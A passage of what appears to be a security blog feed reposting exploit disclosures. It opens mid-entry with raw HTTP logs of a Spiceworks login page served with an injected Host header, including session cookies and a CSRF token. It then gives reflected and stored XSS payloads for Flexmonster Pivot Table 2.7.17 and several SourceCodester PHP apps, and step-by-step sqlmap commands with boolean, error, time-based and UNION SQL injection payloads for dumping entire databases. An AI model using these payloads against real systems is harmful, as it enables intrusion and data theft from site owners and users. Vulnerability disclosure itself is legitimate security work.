spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""} Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 302 Found Date: Tue, 15 Sep 2020 12:46:52 GMT Cache-Control: no-cache X-Runtime: 0 Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly Location: http://google.com/pro_users/login Content-Length: 99 Connection: close Content-Type: text/html; charset=utf-8 <html><body>You are being <a href="http://google.com/pro_users/login">redirected</a>.</body></html> Request:2 GET /pro_users/login HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""} Upgrade-Insecure-Requests: 1 Response:2 (Forgot your password)Link replaced with domain in the header. HTTP/1.1 200 OK Date: Tue, 15 Sep 2020 12:48:26 GMT Cache-Control: private, max-age=0, must-revalidate X-UA-Compatible: IE=edge,chrome=1 X-Runtime: 0 ETag: "77c8f98180ec3f6d4f2fcc8dcd796462" Set-Cookie: compatibility_test=testing; path=/ Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly Content-Length: 9875 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html lang="en" class="no-js desktop"> <head> <meta charset="utf-8" /> <title>Spiceworks</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="author" content="Spiceworks, Inc." /> <meta name="description" content="Network management made simple" /> <meta name="version" content="unknown" /> <noscript> <meta http-equiv="refresh" content="2;url=/sessions/incompatible" /> </noscript> <link href="/assets/sui.css?7500070" media="all" rel="stylesheet" type="text/css" /> <link href="/assets/base.css?7500070" media="all" rel="stylesheet" type="text/css" /> <link href="/assets/application.css?7500070" media="all" rel="stylesheet" type="text/css" /> <!--[if IE]><link href="/stylesheets/hacks.ie.css?7500070" media="all" rel="stylesheet" type="text/css" /><![endif]--> <!--[if IE 7]><link href="/stylesheets/hacks.ie7.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]--> <!--[if IE 8]><link href="/stylesheets/hacks.ie8.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]--> <link href="/stylesheets/print.css?7500070" media="print" rel="stylesheet" type="text/css" /> <link href="/assets/sui-print.css?7500070" media="print" rel="stylesheet" type="text/css" /> <link href="/assets/wizard.css?7500070" media="screen" rel="stylesheet" type="text/css" /> <script src="/assets/sui_bundle.js?7500070" type="text/javascript"></script> <script type="text/javascript"> //<![CDATA[ var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-314222-21']); _gaq.push(['_setDomainName', 'none']); _gaq.push(['_setAllowLinker', true]); _gaq.push(['_trackPageview']); _gaq.push(['_setCustomVar', 1, '_v', '7.5.00070', 3]); _gaq.push(['_setCustomVar', 2, '_d', 'xl', 3]); _gaq.push(['_setCustomVar', 3, '_u', '2', 3]); _gaq.push(['_setCustomVar', 4, '_ul', 'anonymous', 2]); _gaq.push(['_setCustomVar', 5, '_m', 'anonymous', 2]); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); //]]> </script> <script type="text/javascript"> //<![CDATA[ SPICEWORKS.ready(function(){ SPICEWORKS.fire('app:ready'); }); document.observe('dom:loaded', function(){ SPICEWORKS.fire('ready'); }); //]]> </script> <script type="text/javascript"> //<![CDATA[ (function($){ $(document).ready(function(){ $('#flash-notice-message').delay(9000).slideUp(300); }); })(jQuery); //]]> </script> <script type="text/javascript"> //<![CDATA[ var gekko = gekko || {}; gekko.cmd = gekko.cmd || []; gekko.times = gekko.times || []; gekko.times.push({ gekkoRequest: new Date().getTime() }); gekko.client = gekko.client || {}; gekko.client.app = { 'id': 'SWD', 'env': 'p', 'version': '7.5.00070' }; gekko.client.user = {}; gekko.client.user.uuid = 'b7f707b6-f574-44bb-a766-986fc5851a03'; //]]> </script> <script async="false" src="//gekko.spiceworks.com/gekko.js" type="text/javascript"></script> <script async="true" type='text/javascript' src='//www.googletagservices.com/tag/js/gpt.js'></script> <script type="text/javascript"> //<![CDATA[ gekko.cmd.push({cmd: function() { gekko.setAnalytics('_v', '7.5.00070'); }, important: true}); //]]> </script> <script> var SWUFR = SWUFR || {}; SWUFR.cmd = SWUFR.cmd || []; </script> <script async src="//gekko.spiceworks.com/swufr.js"></script> <script> SWUFR.cmd.push(function() { SWUFR.ufr.installed() }); </script> </head> <!--[if lt IE 7]> <body class="left-registerlogin-desktop sui-opt-in ie ie6 lte9 lte8 lte7 desktop"> <![endif]--> <!--[if IE 7]> <body class="left-register login-desktop sui-opt-in ie ie7 lte9 lte8 lte7 desktop"> <![endif]--> <!--[if IE 8]> <body class="left-register login-desktop sui-opt-in ie ie8 lte9 lte8 desktop"> <![endif]--> <!--[if IE 9]> <body class="left-register login-desktop sui-opt-in ie ie9 lte9 desktop"> <![endif]--> <!--[if !IE]><!--> <body class="left-register login-desktop sui-opt-in no-ie desktop"> <!--<![endif]--> <header class="site-navigation sui-opt-in"> <nav class="global-nav affix" data-navbar="global" data-search-autocomplete-min-length=""> <div class="nav-fluid-container"> <a href="/" class="global-nav_brand">Home</a> <img src="//static.spiceworks.com/assets/masthead/print_logo.png" class='global-nav_print-logo' /> </div> </nav> </header> <!--[if lte IE 9]> <div class="modal hide has-footer-in-body" data-backdrop="true" data-isdraggable="false" data-keyboard="false" id="install_chrome_frame"><div class="modal-header"> <h3>I'm gonna have to go ahead and ask you to use a different browser.</h3></div><div class="modal-body"> <img id="lumberg" src="/images/other/yeeeaaah.png" style="float:left; width:200px; "> <div class="sui-opt-in" id="chrome_frame_install" style="padding-left: 10px; overflow:hidden; min-height:150px"> <p style="padding-top:10px; font-size:13px">Yeaaaah… what's happening? </p> <p>We went ahead and stopped supporting Internet Explorer 9 and older in the Spiceworks app (IE10+ is now required), so if you could just go ahead and upgrade IE, that would be great… </p> <p style="padding-top:10px; font-size:11px; color: #AAA;">(Doesn't take long to install, and makes Spiceworks so much faster!)</p> </div> <div class="sui-opt-in" id="chrome_frame_reload" style="padding-left: 10px; overflow:hidden;"> <h4 class=""> <strong> Whoops, looks like you might have gotten stuck. </strong> </h4> </div> <div class="footer-actions blue-permission-granted"> <a class="sui-bttn ieUpgrade" href="#" id="ieUpgrade" onclick=" upgradeIE(); ; return false;">Upgrade Internet Explorer</a> </div> </div></div> <script type="text/javascript"> //<![CDATA[ jQuery(function(){ SPICEWORKS.stats.record("chrome_frame_prompt_shown", {category: 'unsupported_ie'}); jQuery('#install_chrome_frame').modal(); }) function upgradeIE(){ SPICEWORKS.stats.record("installed_newer_ie", {category: 'unsupported_ie'}); window.location.href = "http://windows.microsoft.com/en-US/internet-explorer/download-ie"; } //]]> </script> <![endif] --> <div class="sui-fluid-container"> <div id="content"> <img alt="Startup-bg" id="bg" src="/images/wizard/startup-bg.png?7500070" /> <div id="container"> <div id="wrapper"> <div id="float-msg"> <h1>Spiceworks is ready to rock!</h1> <p>Please enter your login credentials.</p> </div> <div class="main-outer-border"><div class="main-inner-border"><div class="main-header logo"><h1><img alt="Spiceworks" class="logo" src="/images/logos/large.png?7500070" /></h1><div class="shadow-line ">&nbsp</div> </div><div class="main"> <div id="flash-container-for-sessions-new"> </div> <form accept-charset="UTF-8" action="/pro_users/login" class="form-horizontal login" id="login_form" method="post"><div style="margin:0;padding:0;display:inline"><input name="authenticity_token" type="hidden" value="r+sYwqxdzOJAV6XSoVaYQ4HObg5uTfHFjtuDg3ZmH9k=" /></div><div style="margin:0;padding:0;display:inline;"><input name="_pickaxe" type="hidden" value="⸕" /></div> <div class=" control-group"><label for="pro_user_email">Email</label><div class="controls"><input id="pro_user_email" label="Email" name="pro_user[email]" size="30" type="text" /><span class="help-inline"></span></div></div> <div class=" control-group"><label for="pro_user_password">Password</label><div class="controls"><input id="pro_user_password" label="Password" name="pro_user[password]" size="30" type="password" /><span class="help-inline"></span></div></div> <div class="control-group controls forgot_password"> <a href="http://google.com/wizard/password/new" class="forgot-password">Forgot your password?</a> </div> <div class=" control-group"><div class="controls"> <label class='checkbox'> <input name="pro_user[remember_me]" type="hidden" value="0" /><input id="pro_user_remember_me" name="pro_user[remember_me]" type="checkbox" value="1" /> Stay logged in </label> </div></div> <div class=" control-group"><div class="controls"> <button class="sui-bttn-primary sui-bttn " data-button-type="submit" data-primary="true" type="submit">Log in</button> </div></div> </form> </div></div></div> </div> </div> </div> </div> <div id="footer"> <hr/> <span class="pull-left"> <p>Copyright &copy; 2006-16 Spiceworks, Inc.</p> </span> <span class="pull-right"> <p> <a href="https://www.spiceworks.com/about/">About</a> &bull; <a href="https://www.spiceworks.com/privacy/">Privacy</a> &bull; <a href="https://www.spiceworks.com/terms/">Terms</a> &bull; <a href="https://community.spiceworks.com/support?utm_campaign=app_help&utm_medium=app&utm_source=app_ui">Help</a> </p> </span> </div> <script src="/assets/wizard.js?7500070" type="text/javascript"></script> </body> </html>
  18. HireHackking

    Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version:Flexmonster Pivot Table & Charts 2.7.17 # Tested on:Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20142 Cross Site Scripting (XSS) vulnerability in the "To Remote CSV" component under "Open" Menu in Flexmonster Pivot Table & Charts 2.7.17. Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OpenRemoteCSV")><!--
  19. HireHackking

    Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version:Flexmonster Pivot Table & Charts 2.7.17 # Tested on:Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20141 Cross Site Scripting (XSS) vulnerability in the To OLAP (XMLA) component Under the Connect menu in Flexmonster Pivot Table & Charts 2.7.17. Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OLAPTool")><!--
  20. HireHackking

    Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version:Flexmonster Pivot Table & Charts 2.7.17 # Tested on:Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20140 Cross Site Scripting (XSS) vulnerability in Remote Report component under the Open menu in Flexmonster Pivot Table & Charts 2.7.17 Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OpenRemoteReport")><!--
  21. HireHackking

    Point of Sale System 1.0 - Multiple Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Point of Sale System 1.0 - Multiple Stored XSS # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-18 # Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html # Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on "Suppliers" in header and select "Add Supplier". Step 3. Input "<script>alert("r0b0tG4nG")</script>" in all fields of the form. Note: Stored XSS vulnerability can also be found "Customers Page" when you select "Add New Customer". Apply Same method above to execute Stored XSS. Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Suppliers Page", your XSS Payloads will be triggered. Note: Stored XSS can also be triggered when you click on "Products Page" and select "Add New Product".
  22. HireHackking

    Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version: Flexmonster Pivot Table & Charts 2.7.17 # Tested on: Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20139 Cross Site Scripting (XSS) vulnerability in the Remote JSON component Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OpenRemoteJSON")><!--
  23. HireHackking

    Medical Center Portal Management System 1.0 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Medical Center Portal Management System 1.0 - 'id' SQL Injection # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-10 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1. Login to the application with any verified user credentials Step 2. Select Staff and select the view icon. Step 3. You will be redirected to a page like " http://localhost/pages/emp_searchfrm.php?action=edit & id=1". Or visit any page that has the "id" parameter. Capture the current page request in burpsuite Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ". Step 5. This will inject successfully and you will have an information disclosure of all databases contents. --- Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: action=edit & id=(SELECT (CASE WHEN (7289=7289) THEN 22 ELSE (SELECT 4035 UNION SELECT 6415) END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: action=edit & id=22 AND (SELECT 9743 FROM(SELECT COUNT(*),CONCAT(0x716b6a7871,(SELECT (ELT(9743=9743,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=edit & id=22 AND (SELECT 4861 FROM (SELECT(SLEEP(5)))xiXm) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: action=edit & id=22 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b6a7871,0x4b445769664f765073644975666f6e50615968654f6b626259447767746c67516949686365597672,0x71706b7071),NULL,NULL,NULL,NULL-- - ---
  24. HireHackking

    Customer Support System 1.0 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Customer Support System 1.0 - 'id' SQL Injection # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-11 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Patched Version: Unpatched # Category: Web Application # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on Customer and select list. Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ". Step 5. This will inject successfully and you will have an information disclosure of all databases contents. --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=edit_staff&id=1 AND 4164=4164 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV) Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- - ---
  25. HireHackking

    Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-11 # Google Dork: N/A # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1. Login to the application with any valid credentials Step 2. Click on the username in header and select "Manage Account". Step 3. On "Manage Account" page, insert "<script>alert("r0b0tG4nG")</script>" in both the "First Name" & "Last Name" fields. Step 4. Complete the other required details and click on save to update user information. Step 5. This should trigger the XSS payloads. Whenever the user logs in with same valid credentials, the XSS payloads will be triggered